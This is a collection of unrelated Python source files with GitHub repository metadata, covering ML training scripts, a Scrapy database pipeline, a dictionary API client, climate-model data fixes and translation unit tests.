loss.item(), time.time() - start_time))
def test(args, model, private_test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in private_test_loader:
start_time = time.time()
output = model(data)
pred = output.argmax(dim=1)
correct += pred.eq(target.view_as(pred)).sum()
correct = correct.get().float_precision()
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'.format(
correct.item(), len(private_test_loader) * args.test_batch_size,
100. * correct.item() / (len(
private_test_loader) * args.test_batch_size)))
model = Net()
model = model.fix_precision().share(*workers, crypto_provider=crypto_provider, requires_grad=True)
optimizer = optim.SGD(model.parameters(), lr=args.lr)
optimizer = optimizer.fix_precision()
for epoch in range(1, args.epochs + 1):
train(args, model, private_train_loader, optimizer, epoch)
test(args, model, private_test_loader)
| [
"syyun@snu.ac.kr"
] | syyun@snu.ac.kr |
963899297ea299d27a48d4ec9b9e92f8ecd95e6d | ba3fddb7588dd0a86f7f59ebfacebe78a50a6815 | /classification.py | f86bffbbc89c5c1f0a1b4aa375ee860debecc799 | [] | no_license | tobi258/CSCI-576-Final-Project-1 | a94c5ec72f582de5d7f946cbf95c9b046d37e2d2 | 5b80010d2b90157430030205aa640a355976a847 | refs/heads/master | 2023-01-25T02:11:36.857069 | 2020-12-05T00:52:09 | 2020-12-05T00:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,286 | py | import pandas as pd
from pandas import DataFrame as DF
import json
import os
from typing import List
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.ensemble import AdaBoostClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from xgboost import XGBClassifier
def list_files(test_train: str) -> List[str]:
path = os.path.join(root_path, test_train)
feat_paths = [p for p in os.listdir(path) if p.endswith('.json')]
return feat_paths
def read_json(data_paths: list, test_train: str) -> dict:
data = {}
for pt in data_paths:
with open(os.path.join(root_path, test_train, pt), 'r') as f:
feat = json.load(f)
data[feat["feature_name"]] = feat["values"]
return data
def join_dfs(features: dict):
dfs = [{cat: DF.from_dict(features[ft][cat], orient='index', columns=[ft])
for cat in features[ft]} for ft in features]
dfs = [pd.concat(df) for df in dfs]
df = dfs[0].join(dfs[1:])
df.sort_index(axis=1, inplace=True)
return df
def fit_predict(clf) -> list:
clf.fit(X_train, y_train)
return clf.predict(X_test)
def grid_search_cv(model, param_grid, cv=4):
gs = GridSearchCV(model(),
param_grid=param_grid,
scoring='accuracy', cv=cv, n_jobs=-1)
gs.fit(X_train, y_train)
return gs.best_params_
def format_output(input_list) -> List[str]:
return [f'{item:<9}' for item in input_list]
def compare(l1) -> int:
return sum(tup1 == tup2 for tup1, tup2 in zip(l1, y_test))
# list all json files of all features
root_path = "Data"
test_path, train_path = "test_data", "train_data"
test_feat_paths = list_files(test_path)
train_feat_paths = list_files(train_path)
# read all json files into dictionaries
test_feat = read_json(test_feat_paths, test_path)
train_feat = read_json(train_feat_paths, train_path)
# join dataframes into single dataframe
tr_df = join_dfs(train_feat)
te_df = join_dfs(test_feat)
tr_idx1 = tr_df.index.get_level_values(0)
te_idx1 = te_df.index.get_level_values(0)
# train-test data
X_train, X_test, y_train, y_test = tr_df, te_df, tr_idx1, te_idx1
xgb_params = {'n_estimators': (2, 5, 10, 20, 30, 50),
'learning_rate': (.01, .05, .1, .2, .3)}
xgb_params_best = grid_search_cv(XGBClassifier, xgb_params)
xgb_res = fit_predict(XGBClassifier())
gnb_res = fit_predict(GaussianNB())
mnb_res = fit_predict(MultinomialNB())
adb_res = fit_predict(AdaBoostClassifier())
svm_res = fit_predict(SVC())
knn_res = fit_predict(KNeighborsClassifier())
dct_res = fit_predict(DecisionTreeClassifier())
print(f'XGBoost: {format_output(xgb_res)} - {compare(xgb_res)}')
print(f'GaussianNB: {format_output(gnb_res)} - {compare(gnb_res)}')
print(f'MultinomialNB: {format_output(mnb_res)} - {compare(mnb_res)}')
print(f'AdaBoost: {format_output(adb_res)} - {compare(adb_res)}')
print(f'SVM: {format_output(svm_res)} - {compare(svm_res)}')
print(f'KNN: {format_output(knn_res)} - {compare(knn_res)}')
print(f'Decision tree: {format_output(dct_res)} - {compare(dct_res)}')
print(f'Y-test: {format_output(y_test)}')
| [
"yingxuan.guo9771@gmail.com"
] | yingxuan.guo9771@gmail.com |
7913c130e1f4209bcfa6624d9d38a314535ef7cf | 811746ebface45597cf3182af7af3c53021f7348 | /hw_0805.py | 220c8616ed609596fcb7f6ef190a09f92a0dab68 | [] | no_license | injoon5/C3coding-python | 94b217a72047f01d2ac9b366065c8386bc80cadc | 7a314854db88e3168066f7ecb087a607a5b87402 | refs/heads/master | 2022-12-22T20:28:25.728920 | 2020-10-07T11:12:31 | 2020-10-07T11:12:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | files = [
'apple.jpg 20180101', 'Frozen.mp4 20140507',
'Rough.mp3 20160305', 'LoveWhisper.mp3 20170909',
'pizza.jpg 20120505', 'Avengers.mp4 20111225',
'Navillera.mp3 20161005', 'Incredibles2.mp4 20180905',
'lion.jpg 20180726', 'PacificRim.mp4 20131231'
]
| [
"noreply@github.com"
] | injoon5.noreply@github.com |
7e667d3486931ba59373c5e36d220ef4f6aa1832 | fa1730dd1cd97d3c16946d71c2cee46948aef7b6 | /libs/trainer.py | 5aaf9269fba995ef95453de06c3d6d9d05b9fb30 | [] | no_license | dmitrii-marin/fast-semantic-segmentation | 0e613e8296619ed769863b6e3212a5f00a0f9747 | 6bff8a4a5c938c1c8c651e4adfc2dcf75050d942 | refs/heads/master | 2020-04-01T15:14:37.242102 | 2018-10-13T17:54:14 | 2018-10-13T18:13:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,890 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import time
import tensorflow as tf
from third_party import model_deploy
from third_party import mem_util
from builders import model_builder
from builders import dataset_builder
from builders import preprocessor_builder
from builders import optimizer_builder
slim = tf.contrib.slim
prefetch_queue = slim.prefetch_queue
def create_training_input(create_input_fn,
preprocess_fn,
batch_size,
batch_queue_capacity,
batch_queue_threads,
prefetch_queue_capacity):
tensor_dict = create_input_fn()
def cast_and_reshape(tensor_dict, dicy_key):
items = tensor_dict[dicy_key]
float_images = tf.to_float(items)
tensor_dict[dicy_key] = float_images
return tensor_dict
tensor_dict = cast_and_reshape(tensor_dict,
dataset_builder._IMAGE_FIELD)
if preprocess_fn is not None:
preprocessor = preprocess_fn()
tensor_dict = preprocessor(tensor_dict)
batched_tensors = tf.train.batch(tensor_dict,
batch_size=batch_size, num_threads=batch_queue_threads,
capacity=batch_queue_capacity, dynamic_pad=True)
return prefetch_queue.prefetch_queue(batched_tensors,
capacity=prefetch_queue_capacity,
dynamic_pad=False)
def create_training_model_losses(input_queue, create_model_fn, train_config,
train_dir=None, gradient_checkpoints=None):
_, segmentation_model = create_model_fn()
# Optional quantization
if train_config.quantize_with_delay:
tf.logging.info('Adding quantization nodes to training graph...')
tf.contrib.quantize.create_training_graph(
quant_delay=train_config.quantize_with_delay)
read_data_list = input_queue.dequeue()
def extract_images_and_targets(read_data):
images = read_data[dataset_builder._IMAGE_FIELD]
labels = read_data[dataset_builder._LABEL_FIELD]
return (images, labels)
(images, labels) = zip(*map(extract_images_and_targets, [read_data_list]))
# Incase we need to do zero centering, we do it here
preprocessed_images = []
for image in images:
resized_image = segmentation_model.preprocess(image)
preprocessed_images.append(resized_image)
images = tf.concat(preprocessed_images, 0, name="Inputs")
segmentation_model.provide_groundtruth(labels[0])
prediction_dict = segmentation_model.predict(images)
# Add checkpointing nodes to correct collection
if gradient_checkpoints is not None:
tf.logging.info(
'Adding gradient checkpoints to `checkpoints` collection')
graph = tf.get_default_graph()
checkpoint_list = gradient_checkpoints
for checkpoint_node_name in checkpoint_list:
curr_tensor_name = checkpoint_node_name + ":0"
node = graph.get_tensor_by_name(curr_tensor_name)
tf.add_to_collection('checkpoints', node)
# Gather main and aux losses here to single collection
losses_dict = segmentation_model.loss(prediction_dict)
for loss_tensor in losses_dict.values():
tf.losses.add_loss(loss_tensor)
def train_segmentation_model(create_model_fn,
create_input_fn,
train_config,
master,
task,
is_chief,
startup_delay_steps,
train_dir,
num_clones,
num_worker_replicas,
num_ps_tasks,
clone_on_cpu,
replica_id,
num_replicas,
max_checkpoints_to_keep,
save_interval_secs,
image_summaries,
log_memory=False,
gradient_checkpoints=None,
sync_bn_accross_gpu=False):
"""Create an instance of the FastSegmentationModel"""
_, segmentation_model = create_model_fn()
deploy_config = model_deploy.DeploymentConfig(
num_clones=num_clones,
clone_on_cpu=clone_on_cpu,
replica_id=task,
num_replicas=num_worker_replicas,
num_ps_tasks=num_ps_tasks)
startup_delay_steps = task * startup_delay_steps
per_clone_batch_size = train_config.batch_size // num_clones
preprocess_fn = None
if train_config.preprocessor_step:
preprocess_fn = functools.partial(
preprocessor_builder.build,
preprocessor_config_list=train_config.preprocessor_step)
with tf.Graph().as_default():
# CPU of common ps server
with tf.device(deploy_config.variables_device()):
global_step = tf.train.get_or_create_global_step()
with tf.device(deploy_config.inputs_device()): # CPU of each worker
input_queue = create_training_input(
create_input_fn,
preprocess_fn,
per_clone_batch_size,
batch_queue_capacity=train_config.batch_queue_capacity,
batch_queue_threads=train_config.num_batch_queue_threads,
prefetch_queue_capacity=train_config.prefetch_queue_capacity)
# Create the global step on the device storing the variables.
with tf.device(deploy_config.variables_device()):
# Note: it is assumed that any loss created by `model_fn`
# is collected at the tf.GraphKeys.LOSSES collection.
model_fn = functools.partial(create_training_model_losses,
create_model_fn=create_model_fn,
train_config=train_config,
train_dir=train_dir,
gradient_checkpoints=gradient_checkpoints)
clones = model_deploy.create_clones(deploy_config,
model_fn, [input_queue])
first_clone_scope = deploy_config.clone_scope(0)
if sync_bn_accross_gpu:
# Attempt to sync BN updates across all GPU's in a tower.
# Caution since this is very slow. Might not be needed
update_ops = []
for idx in range(num_clones):
nth_clone_sope = deploy_config.clone_scope(0)
update_ops.extend(tf.get_collection(
tf.GraphKeys.UPDATE_OPS, nth_clone_sope))
else:
# Gather updates from first GPU only
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS,
first_clone_scope)
# Init variable to collect summeries
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
# Add summaries for losses.
for loss in tf.get_collection(tf.GraphKeys.LOSSES, first_clone_scope):
summaries.add(tf.summary.scalar('Losses/%s' % loss.op.name, loss))
with tf.device(deploy_config.optimizer_device()): # CPU of each worker
(training_optimizer,
optimizer_summary_vars) = optimizer_builder.build(
train_config.optimizer)
for var in optimizer_summary_vars:
summaries.add(
tf.summary.scalar(var.op.name, var, family='LearningRate'))
# Add summaries for model variables.
for model_var in slim.get_model_variables():
summaries.add(tf.summary.histogram(model_var.op.name, model_var))
# Fine tune from classification or segmentation checkpoints
trainable_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES)
if train_config.fine_tune_checkpoint:
if not train_config.fine_tune_checkpoint_type:
raise ValueError('Must specify `fine_tune_checkpoint_type`.')
tf.logging.info('Initializing %s model from checkpoint %s',
train_config.fine_tune_checkpoint_type,
train_config.fine_tune_checkpoint)
variables_to_restore = segmentation_model.restore_map(
fine_tune_checkpoint_type=train_config.fine_tune_checkpoint_type)
init_fn = slim.assign_from_checkpoint_fn(
train_config.fine_tune_checkpoint,
variables_to_restore,
ignore_missing_vars=True)
if train_config.freeze_fine_tune_backbone:
tf.logging.info('Freezing %s scope from checkpoint.')
non_frozen_vars = []
for var in trainable_vars:
if not var.op.name.startswith(
segmentation_model.shared_feature_extractor_scope):
non_frozen_vars.append(var)
tf.logging.info('Training variable: %s', var.op.name)
trainable_vars = non_frozen_vars
else:
tf.logging.info('Not initializing the model from a checkpoint. '
'Initializing from scratch!')
# TODO(@oandrien): we might want to add gradient multiplier here
# for the last layer if we have trouble with training
# CPU of common ps server
with tf.device(deploy_config.optimizer_device()):
reg_losses = (None if train_config.add_regularization_loss
else [])
total_loss, grads_and_vars = model_deploy.optimize_clones(
clones, training_optimizer,
regularization_losses=reg_losses,
var_list=trainable_vars)
total_loss = tf.check_numerics(total_loss,
'LossTensor is inf or nan.')
summaries.add(
tf.summary.scalar('Losses/TotalLoss', total_loss))
grad_updates = training_optimizer.apply_gradients(grads_and_vars,
global_step=global_step)
update_ops.append(grad_updates)
update_op = tf.group(*update_ops, name='update_barrier')
with tf.control_dependencies([update_op]):
train_op = tf.identity(total_loss, name='train_op')
# TODO: this ideally should not be hardcoded like this.
# should have a way to access the prediction and GT tensor
if image_summaries:
graph = tf.get_default_graph()
pixel_scaling = max(1, 255 // 19)
summ_first_clone_scope = (first_clone_scope + '/'
if first_clone_scope else '')
main_labels = graph.get_tensor_by_name(
'%sSegmentationLoss/Reshape:0'% summ_first_clone_scope)
main_preds = graph.get_tensor_by_name(
'%sSegmentationLoss/Reshape_1:0'% summ_first_clone_scope)
main_preds = tf.cast(main_preds * pixel_scaling, tf.uint8)
summaries.add(
tf.summary.image('VerifyTrainImages/Predictions', main_preds))
main_labels = tf.cast(main_labels * pixel_scaling, tf.uint8)
summaries.add(
tf.summary.image('VerifyTrainImages/Groundtruths', main_labels))
# Add the summaries from the first clone. These contain the summaries
# created by model_fn and either optimize_clones()
# or _gather_clone_loss().
summaries |= set(
tf.get_collection(tf.GraphKeys.SUMMARIES, first_clone_scope))
# Merge all summaries together.
summary_op = tf.summary.merge(list(summaries))
session_config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=True)
# Save checkpoints regularly.
saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)
# HACK to see memory usage.
# TODO: Clean up, pretty messy.
def train_step_mem(sess, train_op, global_step, train_step_kwargs):
start_time = time.time()
run_metadata = tf.RunMetadata()
options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
total_loss, np_global_step = sess.run([train_op, global_step],
options=options,
run_metadata=run_metadata)
time_elapsed = time.time() - start_time
if 'should_log' in train_step_kwargs:
if sess.run(train_step_kwargs['should_log']):
tf.logging.info(
'global step %d: loss = %.4f (%.3f sec/step)',
np_global_step, total_loss, time_elapsed)
if log_memory:
mem_use = mem_util.peak_memory(run_metadata)['/gpu:0']/1e6
tf.logging.info('Memory used: %.2f MB',(mem_use))
if 'should_stop' in train_step_kwargs:
should_stop = sess.run(train_step_kwargs['should_stop'])
else:
should_stop = False
return total_loss, should_stop
# Main training loop
slim.learning.train(
train_op,
train_step_fn=train_step_mem,
logdir=train_dir,
master=master,
is_chief=is_chief,
session_config=session_config,
number_of_steps=train_config.num_steps,
startup_delay_steps=startup_delay_steps,
init_fn=init_fn,
summary_op=summary_op,
save_summaries_secs=120,
save_interval_secs=save_interval_secs,
saver=saver)
| [
"andrienko@live.ca"
] | andrienko@live.ca |
6f1ea8613628207e2684c6f0ca5e634b1b909f47 | 29f828a588cfec578bd75f735a9103f4da5696ff | /91_Python_Tornado_F2E/F2E.im-master/app/webCrawler_scrapy/pipelines.py | 772630485716eed943e25b6e2262ded9f41ca0c1 | [
"MIT",
"BSD-3-Clause"
] | permissive | lzpdzlzpdz/lzpdzlzpdzPython | 8f0dc50dffd057167830a9845959d2e29a675cc1 | 5718190700d9eba39caa11b0d4be7233d279449e | refs/heads/master | 2021-10-11T13:51:39.756353 | 2019-01-27T04:15:45 | 2019-01-27T04:15:45 | 109,458,743 | 0 | 1 | null | 2019-01-27T04:15:46 | 2017-11-04T01:53:50 | Python | UTF-8 | Python | false | false | 3,565 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from twisted.enterprise import adbapi
import MySQLdb
import MySQLdb.cursors
import codecs
import json
from logging import log
class JsonWithEncodingPipeline(object):
'''保存到文件中对应的class
1、在settings.py文件中配置
2、在自己实现的爬虫类中yield item,会自动执行'''
def __init__(self):
self.file = codecs.open('info.json', 'w', encoding='utf-8')#保存为json文件
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"#转为json的
self.file.write(line)#写入文件中
return item
def spider_closed(self, spider):#爬虫结束时关闭文件
self.file.close()
class WebcrawlerScrapyPipeline(object):
'''保存到数据库中对应的class
1、在settings.py文件中配置
2、在自己实现的爬虫类中yield item,会自动执行'''
def __init__(self,dbpool):
self.dbpool=dbpool
''' 这里注释中采用写死在代码中的方式连接线程池,可以从settings配置文件中读取,更加灵活
self.dbpool=adbapi.ConnectionPool('MySQLdb',
host='127.0.0.1',
db='crawlpicturesdb',
user='root',
passwd='123456',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=False)'''
@classmethod
def from_settings(cls,settings):
'''1、@classmethod声明一个类方法,而对于平常我们见到的则叫做实例方法。
2、类方法的第一个参数cls(class的缩写,指这个类本身),而实例方法的第一个参数是self,表示该类的一个实例
3、可以通过类来调用,就像C.f(),相当于java中的静态方法'''
dbparams=dict(
host=settings['MYSQL_HOST'],#读取settings中的配置
db=settings['MYSQL_DBNAME'],
user=settings['MYSQL_USER'],
passwd=settings['MYSQL_PASSWD'],
charset='utf8',#编码要加上,否则可能出现中文乱码问题
cursorclass=MySQLdb.cursors.DictCursor,
use_unicode=False,
)
dbpool=adbapi.ConnectionPool('MySQLdb',**dbparams)#**表示将字典扩展为关键字参数,相当于host=xxx,db=yyy....
return cls(dbpool)#相当于dbpool付给了这个类,self中可以得到
#pipeline默认调用
def process_item(self, item, spider):
query=self.dbpool.runInteraction(self._conditional_insert,item)#调用插入的方法
query.addErrback(self._handle_error,item,spider)#调用异常处理方法
return item
#写入数据库中
def _conditional_insert(self,tx,item):
#print item['name']
sql="insert into testtable(name,url) values(%s,%s)"
params=(item["name"],item["url"])
tx.execute(sql,params)
#错误处理方法
def _handle_error(self, failue, item, spider):
print '--------------database operation exception!!-----------------'
print '-------------------------------------------------------------'
print failue | [
"lzpdzlzpdz@sina.cn"
] | lzpdzlzpdz@sina.cn |
c26a20010545e8b411902603912afc4551a57f92 | d25896680f1b75c4d29f9ba35a6965a1aa03e3ad | /myenv/bin/autopep8 | c3626cb73943284f1c23df0f2b232f8685243de6 | [] | no_license | AydinSanoz/DjangoProject1 | 25eec38ce42cd128f36e753e3e9da689dcf6a61b | b8d2897fb4e03ee72ec523e8ccf01d3f3c9c05d4 | refs/heads/master | 2023-02-06T22:20:17.358303 | 2020-12-28T19:04:17 | 2020-12-28T19:04:17 | 325,047,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | #!/Users/catalina/Desktop/repositories/django/myenv/bin/python3.9
# EASY-INSTALL-ENTRY-SCRIPT: 'autopep8==1.5.4','console_scripts','autopep8'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'autopep8==1.5.4'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('autopep8==1.5.4', 'console_scripts', 'autopep8')())
| [
"aydinsanoz2@gmail.com"
] | aydinsanoz2@gmail.com | |
06f1a43f6bc4ae7fd812d6ce5cd6fbb22658ad50 | 5ec788214449203feff42a68ac85d7eaa8428aa7 | /src/assertion_finder.py | e6ebc059c068361f4eda06dfe583e5b3fd7cb029 | [] | no_license | wangwillson1/polygraph | e89eba0afe95cbaa53f2d047ce37b7093f3d2716 | 545f47fca963bff0c3ab5a34490e3060133a4403 | refs/heads/master | 2023-02-15T18:09:22.540804 | 2021-01-17T13:18:56 | 2021-01-17T13:18:56 | 330,081,349 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,924 | py | import json
from src.definitions import ROOT_PATH, SETTINGS
import requests
from allennlp.data.tokenizers.sentence_splitter import SpacySentenceSplitter
class AssertionFinder:
def __init__(self):
self.base_url = "https://idir.uta.edu/claimbuster/api/v2/score/text/"
self.headers = {
'x-api-key': SETTINGS["assertion_finder"]["api_key"],
'Accept': "*/*",
'Cache-Control': "no-cache",
'Host': "idir.uta.edu",
'Accept-Encoding': "gzip, deflate",
'Connection': "keep-alive",
'cache-control': "no-cache"
}
def assertion_likelihood(self, sentence: str) -> float:
response = requests.request("GET", self.base_url + sentence.replace(" ", "%20"), headers=self.headers)
res = json.loads(response.text)["results"][0]
if res["result"] != "Check-worthy factual statement":
return 0
return res["score"]
def parse_captions(self, captions: dict) -> dict:
# full_text = " ".join(captions.values())
# splitter = SpacySentenceSplitter()
# sentences = splitter.split_sentences(full_text)
# tmstmp_sentences = {k: {"claim": v} for k, v in zip(captions.keys(), sentences)}
# for sentence in tmstmp_sentences.values():
# sentence["claim_score"] = self.assertion_likelihood(sentence["claim"])
#
# print(tmstmp_sentences)
assertions = dict()
c = sorted(list(captions.items()), key=lambda x: float(x[0]))
for i in range(0, len(c), 3):
if i + 2 >= len(c):
break
a = c[i][1] + " " + c[i + 1][1] + " " + c[i + 2][1]
assertions[c[i][0]] = {"claim": a}
for sentence in assertions.values():
sentence["claim_score"] = self.assertion_likelihood(sentence["claim"])
return assertions
# return tmstmp_sentences
| [
"james.rosstwo@gmail.com"
] | james.rosstwo@gmail.com |
60738160b15b49779d9eaf9e8d83139fd7afa508 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5636311922769920_0/Python/sleepingfire/d.py | ba96e3d60f9df7e644e9b38c0dc4523c1c6882bd | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | import sys, os, math
def main(K, C, S):
minimum = math.ceil(K / C)
if minimum > S:
return "IMPOSSIBLE"
cs = [1] * (C + 1)
for i in range(1, C+1):
cs[i] = C * cs[i-1]
tiles = []
idx = 1
depth = 0
for k in range(1, math.ceil(K / C) * C + 1):
idx = (idx - 1) * K + min(k, K)
#print(k, depth, idx)
depth += 1
if depth == C:
tiles.append(idx)
idx = 1
depth = 0
return tiles
if __name__ == "__main__":
in_path = "test.in" if len(sys.argv) == 1 else sys.argv[1]
in_file = open(in_path, 'r')
T = int(in_file.readline().rstrip())
for case_idx in range(T):
K, C, S = [int(z) for z in in_file.readline().rstrip().split()]
res = main(K, C, S)
if isinstance(res, list):
print("Case #{}: {}".format(case_idx + 1, " ".join([str(z) for z in res])))
else:
print("Case #{}: {}".format(case_idx + 1, res))
| [
"alexandra1.back@gmail.com"
] | alexandra1.back@gmail.com |
5181964f5dabcf8422ed8caf47606b01b18e0794 | 2df685967eae6ca93636ea6edb5158c192a27427 | /esmvalcore/cmor/_fixes/cmip6/cesm2_waccm_fv2.py | bc8068af8abd32fb825028a187f30ff1298286cd | [
"Apache-2.0"
] | permissive | BSC-ES/ESMValCore | 4755b7c438624a3adbdaebfb8149b7a2bb022bf3 | 639e5abbf64498abdbe404d9b1ce813bf3f7e42e | refs/heads/main | 2023-08-24T22:44:52.874064 | 2021-10-18T09:27:47 | 2021-10-18T09:27:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """Fixes for CESM2-WACCM-FV2 model."""
from .cesm2 import Tas as BaseTas
from .cesm2 import Fgco2 as BaseFgco2
from .cesm2_waccm import Cl as BaseCl
from .cesm2_waccm import Cli as BaseCli
from .cesm2_waccm import Clw as BaseClw
from ..common import SiconcFixScalarCoord
Cl = BaseCl
Cli = BaseCli
Clw = BaseClw
Fgco2 = BaseFgco2
Siconc = SiconcFixScalarCoord
Tas = BaseTas
| [
"noreply@github.com"
] | BSC-ES.noreply@github.com |
34b46ce40d254e490f29734e91f39c6af8b67bd4 | b07d9b13b677daf5732dc0623b64f6514fc28b73 | /oxford_dict.py | fb1489442792fdf7349daab07d97197a4b1729a1 | [
"Unlicense"
] | permissive | abdnh/anki-oxford-dict | c7c46adac348e5342689ed5af2947d90e6605db9 | 7be9d76619f80ee187aeffd45c5eb7bea0535c1e | refs/heads/master | 2022-11-21T18:33:51.336549 | 2020-07-28T22:54:22 | 2020-07-28T22:54:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | import requests
class ODError(Exception):
pass
class ODConnectionError(ODError):
pass
class ODWordNotFound(ODError):
pass
class OxfordDict:
def __init__(self, app_id, app_key):
self.app_id = app_id
self.app_key = app_key
def get_word_data(self, word, lang='en-gb'):
url = 'https://od-api.oxforddictionaries.com/api/v2/entries/' + lang + '/' + word + '?strictMatch=false'
try:
r = requests.get(url, headers = {'app_id': self.app_id, 'app_key': self.app_key})
except requests.exceptions.RequestException:
raise ODConnectionError("connection failed")
if r.status_code == 404:
raise ODWordNotFound(f"'{word}' not found in the dictionary")
return r.json()
| [
"abd.nh25@gmail.com"
] | abd.nh25@gmail.com |
a24387d89088254301d368ebf2e5e55d143a8c4c | 0f0f8b3b027f412930ca1890b0666538358a2807 | /dotop/addons/base/tests/test_translate.py | c61011c1179ece9a596ac5d562a30db71e6c1d7e | [] | no_license | konsoar/dotop_pos_v11 | 741bd5ca944dfd52eb886cab6f4b17b6d646e131 | 576c860917edd25661a72726d0729c769977f39a | refs/heads/master | 2021-09-06T13:25:34.783729 | 2018-02-07T02:11:12 | 2018-02-07T02:11:12 | 111,168,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,651 | py | # -*- coding: utf-8 -*-
# Part of dotop. See LICENSE file for full copyright and licensing details.
import unittest
from dotop.tools.translate import quote, unquote, xml_translate, html_translate
from dotop.tests.common import TransactionCase
class TranslationToolsTestCase(unittest.TestCase):
def test_quote_unquote(self):
def test_string(str):
quoted = quote(str)
#print "\n1:", repr(str)
#print "2:", repr(quoted)
unquoted = unquote("".join(quoted.split('"\n"')))
#print "3:", repr(unquoted)
self.assertEquals(str, unquoted)
test_string("""test \nall kinds\n \n o\r
\\\\ nope\n\n"
""")
# The ones with 1+ backslashes directly followed by
# a newline or literal N can fail... we would need a
# state-machine parser to handle these, but this would
# be much slower so it's better to avoid them at the moment
self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
\\\\nope\n\n"
""")
def test_translate_xml_base(self):
""" Test xml_translate() without formatting elements. """
terms = []
source = """<form string="Form stuff">
<h1>Blah blah blah</h1>
Put some more text here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah blah blah', 'Put some more text here'])
def test_translate_xml_text(self):
""" Test xml_translate() on plain text. """
terms = []
source = "Blah blah blah"
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms, [source])
def test_translate_xml_text_entity(self):
""" Test xml_translate() on plain text with HTML escaped entities. """
terms = []
source = "Blah&nbsp;blah&nbsp;blah"
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms, [source])
def test_translate_xml_inline1(self):
""" Test xml_translate() with formatting elements. """
terms = []
source = """<form string="Form stuff">
<h1>Blah <i>blah</i> blah</h1>
Put some <b>more text</b> here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah <i>blah</i> blah', 'Put some <b>more text</b> here'])
def test_translate_xml_inline2(self):
""" Test xml_translate() with formatting elements embedding other elements. """
terms = []
source = """<form string="Form stuff">
<b><h1>Blah <i>blah</i> blah</h1></b>
Put <em>some <b>more text</b></em> here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah <i>blah</i> blah', 'Put <em>some <b>more text</b></em> here'])
def test_translate_xml_inline3(self):
""" Test xml_translate() with formatting elements without actual text. """
terms = []
source = """<form string="Form stuff">
<div>
<span class="before"/>
<h1>Blah blah blah</h1>
<span class="after">
<i class="hack"/>
</span>
</div>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah blah blah'])
def test_translate_xml_t(self):
""" Test xml_translate() with t-* attributes. """
terms = []
source = """<t t-name="stuff">
stuff before
<span t-field="o.name"/>
stuff after
</t>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['stuff before', 'stuff after'])
def test_translate_xml_off(self):
""" Test xml_translate() with attribute translate="off". """
terms = []
source = """<div>
stuff before
<div t-translation="off">Do not translate this</div>
stuff after
</div>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['stuff before', 'stuff after'])
def test_translate_xml_attribute(self):
""" Test xml_translate() with <attribute> elements. """
terms = []
source = """<field name="foo" position="attributes">
<attribute name="string">Translate this</attribute>
<attribute name="option">Do not translate this</attribute>
</field>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Translate this'])
def test_translate_xml_a(self):
""" Test xml_translate() with <a> elements. """
terms = []
source = """<t t-name="stuff">
<ul class="nav navbar-nav">
<li>
<a class="oe_menu_leaf" href="/web#menu_id=42&action=54">
<span class="oe_menu_text">Blah</span>
</a>
</li>
<li class="dropdown" id="menu_more_container" style="display: none;">
